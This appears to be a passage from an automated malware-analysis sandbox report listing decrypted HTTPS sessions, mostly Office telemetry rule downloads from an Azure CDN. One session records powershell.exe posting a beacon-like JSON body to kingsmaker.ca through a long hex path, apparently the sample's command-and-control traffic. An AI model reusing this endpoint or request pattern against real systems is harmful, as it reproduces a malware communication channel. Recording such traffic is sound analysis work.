                                                                                                                            2024-11-29 07:31:32 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 73 6f 75 72 63 65 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenResources" S="Medium" /> <F T="2


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            131192.168.2.54985213.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:32 UTC192OUTGET /rules/rule703500v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:31:32 UTC494INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:32 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 1362
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                            ETag: "0x8DC582BDF497570"
                                                                                                                            x-ms-request-id: db5a5c06-801e-00a0-75f9-412196000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073132Z-174f7845968swgbqhC1EWRmnb40000000zs0000000006cvd
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:31:32 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61 6e 64 62 6f 78 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703500" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSandbox" S="Medium" /> <F T="2">


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            132192.168.2.54985313.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:32 UTC192OUTGET /rules/rule701801v1s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:31:33 UTC494INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:32 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 1403
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                            ETag: "0x8DC582BDC2EEE03"
                                                                                                                            x-ms-request-id: 10a6c0b8-301e-0033-4f29-41fa9c000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073132Z-174f7845968qj8jrhC1EWRh41s0000000zng000000001hpd
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:31:33 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            133192.168.2.54985513.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:32 UTC192OUTGET /rules/rule701051v1s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:31:33 UTC494INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:33 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 1399
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:47 GMT
                                                                                                                            ETag: "0x8DC582BE1CC18CD"
                                                                                                                            x-ms-request-id: fcce73e1-901e-008f-60e1-4167a6000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073133Z-174f7845968swgbqhC1EWRmnb40000000zsg000000005kmu
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:31:33 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRe


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            134192.168.2.54985613.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:34 UTC192OUTGET /rules/rule701050v1s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:31:34 UTC494INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:34 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 1362
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                            ETag: "0x8DC582BEB256F43"
                                                                                                                            x-ms-request-id: 5692b7f9-f01e-00aa-21f6-418521000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073134Z-174f7845968pf68xhC1EWRr4h80000000zu0000000007b71
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:31:34 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 6c 65 61 73 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRelease" S="Medium" /> <F T="2">


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            135192.168.2.54985713.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:34 UTC192OUTGET /rules/rule702751v1s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:31:35 UTC494INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:34 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 1403
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                            ETag: "0x8DC582BEB866CDB"
                                                                                                                            x-ms-request-id: a56f9727-801e-0035-2f31-40752a000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073134Z-174f78459685m244hC1EWRgp2c0000000zgg000000001z55
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:31:35 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            136192.168.2.549861104.21.75.1704437368C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:34 UTC283OUTPOST /4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b66496034c845ffb376a509fda7f7ab3d1d HTTP/1.1
                                                                                                                            Content-Type: application/json
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                            Host: kingsmaker.ca
                                                                                                                            Content-Length: 64
                                                                                                                            2024-11-29 07:31:34 UTC64OUTData Raw: 5b 0d 0a 20 20 20 20 22 5c 22 72 75 6e 20 74 61 73 6b 5c 22 22 2c 0d 0a 20 20 20 20 22 5c 22 6b 65 74 20 74 68 75 63 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d
                                                                                                                            Data Ascii: [ "\"run task\"", "\"ket thuc\"", "----------"]
                                                                                                                            2024-11-29 07:31:35 UTC995INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:35 GMT
                                                                                                                            Content-Length: 0
                                                                                                                            Connection: close
                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Pw9l1aJkWrcPaBOX%2F5srbNbrko9uoX3f9OnSPLlqlm%2BsoDPsIdEo42wvjNdpmsxHcPG1AZ59pRrq7FTIB9rPbJKEng5Ua6mFfw7ceoVIIkOdf3MMarJEjdiHnHKrRsHbAbkSFimL2TTm"}],"group":"cf-nel","max_age":604800}
                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=55158&min_rtt=1013&rtt_var=3175&sent=19658&recv=9653&lost=0&retrans=0&sent_bytes=27565133&recv_bytes=334564&delivery_rate=47135761&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                            X-Powered-By: ARR/3.0
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8ea0e61f6d8943bd-EWR
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1592&min_rtt=1587&rtt_var=605&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1007&delivery_rate=1793611&cwnd=190&unsent_bytes=0&cid=555b0d411008085c&ts=1009&x=0"


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            137192.168.2.54985813.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:34 UTC192OUTGET /rules/rule702750v1s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:31:35 UTC494INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:34 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 1366
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                                                            ETag: "0x8DC582BE5B7B174"
                                                                                                                            x-ms-request-id: b0621631-101e-008e-3d91-3fcf88000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073134Z-174f7845968glpgnhC1EWR7uec0000000zqg000000009n1a
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:31:35 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 75 62 6c 69 73 68 65 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPublisher" S="Medium" /> <F T="2


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            138192.168.2.54985913.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:34 UTC192OUTGET /rules/rule702301v1s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:31:35 UTC494INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:35 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 1399
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:28:00 GMT
                                                                                                                            ETag: "0x8DC582BE976026E"
                                                                                                                            x-ms-request-id: 460b6522-701e-0097-5815-41b8c1000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073135Z-174f7845968n2hr8hC1EWR9cag0000000zc0000000000118
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:31:35 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702301" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPr


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            139192.168.2.54986013.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:35 UTC192OUTGET /rules/rule702300v1s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:31:35 UTC494INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:35 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 1362
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                                                                                                            ETag: "0x8DC582BDC13EFEF"
                                                                                                                            x-ms-request-id: e83b5619-a01e-000d-5811-41d1ea000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073135Z-174f78459685m244hC1EWRgp2c0000000zbg00000000a5bb
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:31:35 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 6a 65 63 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702300" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProject" S="Medium" /> <F T="2">


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            140192.168.2.54986313.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:36 UTC192OUTGET /rules/rule703401v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:31:36 UTC494INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:36 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 1425
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                                                                                            ETag: "0x8DC582BE6BD89A1"
                                                                                                                            x-ms-request-id: c922d918-601e-0032-6e42-41eebb000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073136Z-174f7845968j6t2phC1EWRcfe80000000zt000000000453t
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
